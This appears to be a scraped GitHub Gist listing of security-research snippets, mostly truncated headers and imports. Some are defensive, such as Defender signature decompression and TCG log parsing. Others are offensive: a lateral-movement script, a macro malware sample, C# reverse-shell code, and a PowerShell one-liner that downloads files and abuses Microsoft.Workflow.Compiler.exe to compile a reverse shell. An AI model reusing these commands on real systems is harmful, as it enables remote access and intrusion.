Dan danzek

Listening to meowzek
mattifestation / ExpandDefenderSig.ps1
Created Mar 28, 2019
Decompresses Windows Defender AV signatures for exploration purposes
filter Expand-DefenderAVSignatureDB {
Decompresses a Windows Defender AV signature database (.VDM file).
Expand-DefenderAVSignatureDB extracts a Windows Defender AV signature database (.VDM file). This function was developed by reversing mpengine.dll and with the help of Tavis Ormandy and his LoadLibrary project ( Note: Currently, "scrambled" databases are not supported, although I have yet to encounter a scrambled database. Thus far, all databases I've encountered are zlib-compressed.
Invoke-AccessXSLT.ps1
Lateral Movement Via MSACCESS TransformXML
Author: Philip Tsukerman (@PhilipTsukerman)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
function Invoke-AccessXSLT {
mattifestation / SimpleTCGLogParser.ps1
Last active Apr 14, 2019
If you have the HgsDiagnostics PowerShell module, then you can parse TCG logs.
Import-Module HgsDiagnostics
$GetHgsTrace = Get-Command Get-HgsTrace
$RemoteAttestationCoreReference = $GetHgsTrace.ImplementingType.Assembly.GetReferencedAssemblies() | Where-Object { $_.Name -eq 'Microsoft.Windows.RemoteAttestation.Core' }
Add-Type -AssemblyName $RemoteAttestationCoreReference.FullName
$MostRecentTCGLog = Get-ChildItem C:\Windows\Logs\MeasuredBoot | Sort-Object -Property LastWriteTime -Descending | Select-Object -First 1 | Select-Object -ExpandProperty FullName
$LogBytes = [IO.File]::ReadAllBytes($MostRecentTCGLog)
$ParsedTCGLog = [Microsoft.Windows.RemoteAttestation.Core.TcgEventLog]::Parse($LogBytes)
$ParsedTCGLog.TcgData.Children | Sort-Object -Property PcrIndex | Group-Object -Property PcrIndex
sf-jonstewart /
Last active Feb 21, 2019
Stroz Friedberg developer Shane McCulley rewrote our Python scripts for parsing Windows shell items using Kaitai. We'll contribute the definitions to Kaitai as open source. shows how to construct a parser on top of the Kaitai-generated parsers. This is an unsupported pre-release. Feedback welcome!
import datetime
from typing import AnyStr, Generator, Optional, Tuple, Type, Union
import uuid
from kaitaistruct import BytesIO, KaitaiStream
import known_uuids
import logging
import ShellItemList
JohnLaTwC / star basic macro malware.txt
Created Feb 7, 2019
StarBasic macro Malware (Uploaded by @JohnLaTwC)
## Uploaded by @JohnLaTwC
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE script:module PUBLIC "-// OfficeDocument 1.0//EN" "module.dtd">
<script:module xmlns:script="" script:name="Module1" script:language="StarBasic">REM ***** BASIC *****
Sub OnLoad
Dim os as string
#!/usr/bin/env python3
import os
from time import sleep
FILE_PATH = 'ts.txt'
def get_atime_1():
    result = os.stat(FILE_PATH, follow_symlinks=False)
    return result.st_atime
abandonedInprocServer32.cs
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Management;
namespace ComAbandonment
public class ComAbandonment
BankSecurity / Simple_Rev_Shell.cs
Last active Sep 17, 2019
C# Simple Reverse Shell Code
using System;
using System.Text;
using System.IO;
using System.Diagnostics;
using System.ComponentModel;
using System.Linq;
using System.Net;
using System.Net.Sockets;
BankSecurity / PowerShell_Command.txt
Created Oct 1, 2018
Reverse Shell PowerShell command Abusing Microsoft.Workflow.Compiler.exe
powershell -command "& { (New-Object Net.WebClient).DownloadFile('', '.\REV.txt') }" && powershell -command "& { (New-Object Net.WebClient).DownloadFile('', '.\Rev.Shell') }" && C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe REV.txt Rev.Shell
BankSecurity / Rev.Shell
Created Oct 1, 2018
Abuse Microsoft.Workflow.Compiler.exe to compile a C# Reverse Shell
using System;
using System.Text;
using System.IO;
using System.Diagnostics;
using System.ComponentModel;
using System.Net;
using System.Net.Sockets;
using System.Workflow.Activities;
public class Program : SequentialWorkflowActivity